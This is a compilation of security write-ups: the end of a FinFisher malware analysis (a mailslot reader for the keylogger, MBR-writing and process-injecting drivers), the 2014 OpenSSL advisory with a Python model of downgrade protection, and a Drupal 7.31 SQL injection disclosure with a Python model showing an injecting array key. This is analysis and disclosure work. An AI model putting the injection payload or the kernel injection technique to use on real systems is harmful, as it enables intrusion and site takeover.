        &cbMessage,                           // size of next message
        &cMessage,                            // number of messages
        (LPDWORD) NULL);                      // no read time-out

    if (!fResult)
    {
        printf("GetMailslotInfo failed with %d.\n", GetLastError());
        CloseHandle(hEvent);
        return FALSE;
    }

    if (cbMessage == MAILSLOT_NO_MESSAGE)
    {
        CloseHandle(hEvent);
        return TRUE;
    }

    cAllMessages = cMessage;

    while (cMessage != 0)  // retrieve all messages
    {
        // Create a message-number string.
        StringCchPrintf((LPTSTR) achID, 80, TEXT("\nMessage #%d of %d\n"),
                        cAllMessages - cMessage + 1, cAllMessages);

        // Allocate memory for the message.
        lpszBuffer = (LPTSTR) GlobalAlloc(GPTR, lstrlen((LPTSTR) achID)*sizeof(TCHAR) + cbMessage);
        if( NULL == lpszBuffer )
        {
            CloseHandle(hEvent);
            return FALSE;
        }
        lpszBuffer[0] = '\0';

        fResult = ReadFile(hSlot, lpszBuffer, cbMessage, &cbRead, &ov);
        if (!fResult)
        {
            printf("ReadFile failed with %d.\n", GetLastError());
            GlobalFree((HGLOBAL) lpszBuffer);
            CloseHandle(hEvent);
            return FALSE;
        }

        // Concatenate the message and the message-number string.
        StringCbCat(lpszBuffer, lstrlen((LPTSTR) achID)*sizeof(TCHAR)+cbMessage, (LPTSTR) achID);

        // Display the message.
        _tprintf(TEXT("Contents of the mailslot: %s\n"), lpszBuffer);

        GlobalFree((HGLOBAL) lpszBuffer);

        fResult = GetMailslotInfo(hSlot,     // mailslot handle
            (LPDWORD) NULL,                   // no maximum message size
            &cbMessage,                       // size of next message
            &cMessage,                        // number of messages
            (LPDWORD) NULL);                  // no read time-out

        if (!fResult)
        {
            printf("GetMailslotInfo failed (%d)\n", GetLastError());
            CloseHandle(hEvent);
            return FALSE;
        }
    }
    CloseHandle(hEvent);
    return TRUE;
}

BOOL WINAPI MakeSlot(LPTSTR lpszSlotName)
{
    TheSlot1 = CreateMailslot(lpszSlotName,
        0,                                    // no maximum message size
        MAILSLOT_WAIT_FOREVER,                // no time-out for operations
        (LPSECURITY_ATTRIBUTES) NULL);        // default security

    if (TheSlot1 == INVALID_HANDLE_VALUE)
    {
        printf("CreateMailslot failed with %d\n", GetLastError());
        return FALSE;
    }
    return TRUE;
}

BOOL WINAPI MakeSlot2(LPTSTR lpszSlotName)
{
    TheSlot2 = CreateMailslot(lpszSlotName,
        0,                                    // no maximum message size
        MAILSLOT_WAIT_FOREVER,                // no time-out for operations
        (LPSECURITY_ATTRIBUTES) NULL);        // default security

    if (TheSlot2 == INVALID_HANDLE_VALUE)
    {
        printf("CreateMailslot failed with %d\n", GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(void)
{
    MakeSlot(SlotName);
    MakeSlot2(SlotName2);
    while(TRUE)
    {
        ReadSlot(TheSlot1);
        ReadSlot(TheSlot2);
        Sleep(1000);
    }
    return 0;
}

Here is the result while the Finfisher keylogger was running:

b) Driverw.sys

I'll keep this one short as the actual work of this driver is almost nothing. During MBR infection, user-mode code tries to access \\.\PhysicalDrive0; if it was able to open the physical drive successfully, it won't bother with driverw at all. If user-mode code wasn't able to access the physical drive, it will load driverw.sys and call it from user mode to first open the physical drive, then it calls the driver several times again to read and write to the physical drive. So I think maybe they called it driverw because it's a helper driver for Writing MBR code.

As you can see, it defines two functions only: one function which I renamed to FuncDiskAccess (the actual main function, which accesses the disk etc.) and UnloadDriver. Then the driver calls ObReferenceObjectByHandle to get the device object pointer. Consequently it calls IoGetAttachedDeviceReference to get the DeviceObject itself. Now having the device object, it can directly call IRPs of this object's driver. So it will have direct access to the whole PhysicalDrive0 without any check or access control. As a last step it uses the undocumented or "not-well-documented" IofCallDriver function to read/write to disk.

c) mssounddx.sys

We actually talked about this driver in the previous post during MBR analysis. But here I'll analyze it a little deeper. This driver is basically a process injector: it waits for winlogon.exe and explorer.exe to run, then it allocates memory in them, decrypts the malware payload using the same XOR algorithm and finally calls the NtCreateThread function. Here is the breakdown:

Driver entry: As you can see it simply calls a function which I renamed to InitAndCreateThread. This function checks for the registry mssounddx entry; if it exists, it creates a system thread:

As you can see in the picture above, the thread function is StartRoutine. This is what StartRoutine looks like:

This is the driver's start routine. As you can see, first it reads the SSDT (KeServiceDescriptorTable), then it calls a function which I renamed to LocateNtCreateThread. This function basically locates NtCreateThread in the SSDT. See:

Using these xor and sub instructions, it allocates and pushes 2 strings onto the stack, ntdll.dll and NtCreateThread. After pushing the strings onto the stack, it calls ResolveAPI, which allocates a pool with the 0x11223344 tag, then calls ZwQuerySystemInformation with the SystemProcessInformation (0x0B) class. Then first it loops through modules to find ntdll.dll; afterwards, it loops through ntdll.dll functions to locate the NtCreateThread function. In the end, it calls ExFreePoolTag to free the 0x11223344 pool.

Back to StartRoutine, you'll see there is a call to a function which I renamed to InjectToProcess. This function is the whole purpose of the driver. This function waits for winlogon.exe and explorer.exe to run; until then, it keeps calling KeDelayExecutionThread (2 second delay). See:

Then there is unnecessary code here; actually I don't think it's possible to have explorer.exe running without winlogon.exe already running, but I think the programmers just copy/pasted the loop code for winlogon.exe, which is unnecessary. See:

When it finds WinLogon.exe, it opens the process using ZwOpenProcess, then it allocates memory several times in it:

Next it finds the offset of the DLL to inject and decrypts it using the same XOR algorithm:

XOR algorithm, which is the same in all Finfisher malware modules:

In the end, it calls the dynamically found NtCreateThread, frees the allocated memory pages used in kernel, and calls PsTerminateSystemThread to terminate its own thread.

That's it. I hope you enjoyed the whole Finfisher malware analysis series. Feel free to comment or send an email about your questions. Also I want to thank everyone who helped to spread the word by retweeting, I really appreciate it.

Source: https://www.codeandsec.net/FinFisher-Shell-Extension-and-Drivers-Analysis
-
OpenSSL Security Advisory [15 Oct 2014]
=======================================

SRTP Memory Leak (CVE-2014-3513)
================================

Severity: High

A flaw in the DTLS SRTP extension parsing code allows an attacker, who sends a carefully crafted handshake message, to cause OpenSSL to fail to free up to 64k of memory causing a memory leak. This could be exploited in a Denial Of Service attack. This issue affects OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. Implementations of OpenSSL that have been compiled with OPENSSL_NO_SRTP defined are not affected.

OpenSSL 1.0.1 users should upgrade to 1.0.1j.

This issue was reported to OpenSSL on 26th September 2014, based on an original issue and patch developed by the LibreSSL project. Further analysis of the issue was performed by the OpenSSL team. The fix was developed by the OpenSSL team.

Session Ticket Memory Leak (CVE-2014-3567)
==========================================

Severity: Medium

When an OpenSSL SSL/TLS/DTLS server receives a session ticket the integrity of that ticket is first verified. In the event of a session ticket integrity check failing, OpenSSL will fail to free memory causing a memory leak. By sending a large number of invalid session tickets an attacker could exploit this issue in a Denial Of Service attack.

OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.

This issue was reported to OpenSSL on 8th October 2014. The fix was developed by Stephen Henson of the OpenSSL core team.

SSL 3.0 Fallback protection
===========================

Severity: Medium

OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade.

Some client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE (CVE-2014-3566).

OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.

https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00
https://www.openssl.org/~bodo/ssl-poodle.pdf

Support for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller.

Build option no-ssl3 is incomplete (CVE-2014-3568)
==================================================

Severity: Low

When OpenSSL is configured with "no-ssl3" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them.

OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.

This issue was reported to OpenSSL by Akamai Technologies on 14th October 2014. The fix was developed by Akamai and the OpenSSL team.

References
==========

URL for this Security Advisory:
https://www.openssl.org/news/secadv_20141015.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html

Source: https://www.openssl.org/news/secadv_20141015.txt
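The fallback-protection mechanism the advisory introduces, traced end to end as an added example (this is not OpenSSL's code): a client fallback loop of the kind browsers use, and the server-side rule that TLS_FALLBACK_SCSV adds. The function names and the toy `mitm_blocks_above` switch are assumptions made for this example; the protocol constants are the real ones.

```python
"""TLS_FALLBACK_SCSV downgrade protection, modelled end to end.

Added example, not OpenSSL's code: it simulates the client fallback loop
that browsers use and the server-side check that TLS_FALLBACK_SCSV adds
(draft-ietf-tls-downgrade-scsv), so the effect of the new OpenSSL feature
can be traced without a network. The function names and the toy
`mitm_blocks_above` switch are assumptions made for this example; the
protocol constants are the real ones.
"""

# Protocol versions as (major, minor) so they compare in the natural order.
SSL3_0, TLS1_0, TLS1_1, TLS1_2 = (3, 0), (3, 1), (3, 2), (3, 3)

TLS_FALLBACK_SCSV = 0x5600            # signalling cipher-suite value
ALERT_INAPPROPRIATE_FALLBACK = 86     # alert a server sends to refuse the fallback
AES128_SHA = 0x002F                   # an ordinary suite, so the list looks realistic


def server_hello_decision(server_max, client_version, cipher_suites):
    """Server-side rule from the draft.

    If the ClientHello carries TLS_FALLBACK_SCSV and its version is below the
    highest version this server supports, the client is retrying after a
    failed handshake that should have succeeded: refuse with an alert.
    Otherwise negotiate the highest version both sides support.
    """
    if TLS_FALLBACK_SCSV in cipher_suites and client_version < server_max:
        return ("alert", ALERT_INAPPROPRIATE_FALLBACK)
    return ("server_hello", min(server_max, client_version))


def client_connect(server_max, mitm_blocks_above=None, send_scsv=True):
    """Client fallback loop: try the highest version first, retry one version
    lower whenever the handshake does not complete, and (with send_scsv) add
    TLS_FALLBACK_SCSV to every retry but never to the first attempt.

    mitm_blocks_above simulates an active attacker who drops every handshake
    whose version is above the given one; None means no attacker.
    Returns (outcome, version): ('ok', negotiated), ('alert', attempted) or
    ('failed', None).
    """
    for attempt, version in enumerate((TLS1_2, TLS1_1, TLS1_0, SSL3_0)):
        if mitm_blocks_above is not None and version > mitm_blocks_above:
            continue                                  # handshake never completes
        suites = [AES128_SHA]
        if send_scsv and attempt > 0:
            suites.append(TLS_FALLBACK_SCSV)          # this is a fallback retry
        kind, value = server_hello_decision(server_max, version, suites)
        if kind == "alert":
            return ("alert", version)                 # downgrade detected, stop
        return ("ok", value)
    return ("failed", None)


if __name__ == "__main__":
    print("no attacker, modern server        :", client_connect(TLS1_2))
    print("attacker, modern server, with SCSV:", client_connect(TLS1_2, SSL3_0))
    print("attacker, modern server, no SCSV  :", client_connect(TLS1_2, SSL3_0, send_scsv=False))
    print("attacker, SSLv3-only server       :", client_connect(SSL3_0, SSL3_0))
```

The third scenario is the pre-fix situation: without the SCSV the server cannot tell a genuine SSL 3.0 client from a modern client that was pushed down, so the downgrade succeeds. The fourth shows why the signal is safe to deploy: a server whose best version really is SSL 3.0 still accepts the fallback, so interoperability with legacy servers is preserved.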
-
Drupal 7.31 pre Auth SQL Injection Vulnerability

Posted: 2014-10-15 10:20 by Stefan Horst

Introduction

Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. Drupal 7 is used by a vast number of sites and all of them are vulnerable.

During a source code audit for a customer we found an SQL Injection Vulnerability in Drupal's core handling of SQL queries, which we disclosed to the vendor. With this bug an attacker can gain full control over all Drupal sites (Admin privileges), without knowledge of internals or authentication on the site. He can even execute PHP Code without leaving a trace in any log. The Bug was introduced in early 2011 and stayed well hidden in the core framework.

In this post we will discuss the SQL Injection on a higher level. If you want all technical details please refer to the Advisory we released. We will wait until enough sites have had time to update before we release a PoC, since this is a severe bug, which allows an attacker to execute arbitrary code with only one HTTP request and no knowledge of the site whatsoever.

The Vulnerability

All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:

SELECT * FROM {users} WHERE name IN (:name_0, :name_1)

This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control $key0 and $key1 he can manipulate the SQL query to look like this:

SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)

which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example. If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.

Stefan Horst

Source: https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html
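The placeholder expansion the post describes, modelled in Python as an added example (this is not Drupal's code): the flawed expansion that takes the placeholder suffix from the caller-supplied array key sits beside the hardened one that numbers the placeholders sequentially, which is what the Drupal 7.32 fix does with array_values(), plus a check that flags when a bound placeholder name is no longer a plain identifier. The function names, the sample query and the sample input are assumptions for this example.

```python
"""Model of the Drupal 7 placeholder expansion described in the post.

Added example, not Drupal's own code: it re-implements in Python the step
that turns ':name' into one placeholder per array element, once in the
flawed form (placeholder suffix taken from the caller-supplied array key)
and once in the hardened form (suffix taken from a sequential index, which
is what the Drupal 7.32 fix does with array_values()). The function names,
the sample query and the sample input are assumptions for this example.
"""
import re

# A bound placeholder name may only ever be an identifier; anything else
# means SQL text has been spliced into the query.
SAFE_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def _expand(query, args, use_array_keys):
    """Expand every array-valued argument into ':<name>_<suffix>' placeholders.

    use_array_keys=True reproduces the vulnerable behaviour; False uses
    enumerate() so the suffix is always 0, 1, 2, ... regardless of the keys.
    """
    bound = {}
    for name, value in args.items():
        if not isinstance(value, dict):
            bound[name] = value
            continue
        if use_array_keys:
            items = list(value.items())
        else:
            items = list(enumerate(value.values()))
        new_names = ["%s_%s" % (name, key) for key, _ in items]
        replacement = ", ".join(":" + n for n in new_names)
        # Word boundary so ':name' does not also match ':name_0' placeholders.
        query = re.sub(r":%s\b" % re.escape(name), lambda _m: replacement, query)
        for new_name, (_, item) in zip(new_names, items):
            bound[new_name] = item
    return query, bound


def expand_vulnerable(query, args):
    """Drupal 7.31 behaviour: array keys leak into the SQL text."""
    return _expand(query, args, use_array_keys=True)


def expand_fixed(query, args):
    """Hardened behaviour: placeholders are numbered, keys are discarded."""
    return _expand(query, args, use_array_keys=False)


def bound_names_are_safe(bound):
    """Check that every bound placeholder name is a plain identifier."""
    return all(SAFE_NAME.fullmatch(name) for name in bound)


QUERY = "SELECT * FROM {users} WHERE name IN (:name)"

# Constructed input: what a request with an attacker-chosen array key looks
# like once PHP has parsed it (a string key next to the normal integer key).
MALICIOUS_ARGS = {"name": {"test) OR name = 'Admin' -- ": "bob", 0: "larry"}}


if __name__ == "__main__":
    for label, expand in (("7.31 (vulnerable)", expand_vulnerable),
                          ("7.32 (fixed)", expand_fixed)):
        sql, bound = expand(QUERY, MALICIOUS_ARGS)
        print(label)
        print("  query:", sql)
        print("  bound:", bound)
        print("  safe :", bound_names_are_safe(bound))
```

Running it shows the two outcomes side by side: the vulnerable expansion yields `... IN (:name_test) OR name = 'Admin' -- , :name_0)`, the same shape as the injected query in the post, while the fixed expansion yields `... IN (:name_0, :name_1)` with the attacker's key reduced to an ordinary bound value. The `bound_names_are_safe` check is the kind of invariant a database layer can assert on every expanded query, independent of how the placeholders were generated.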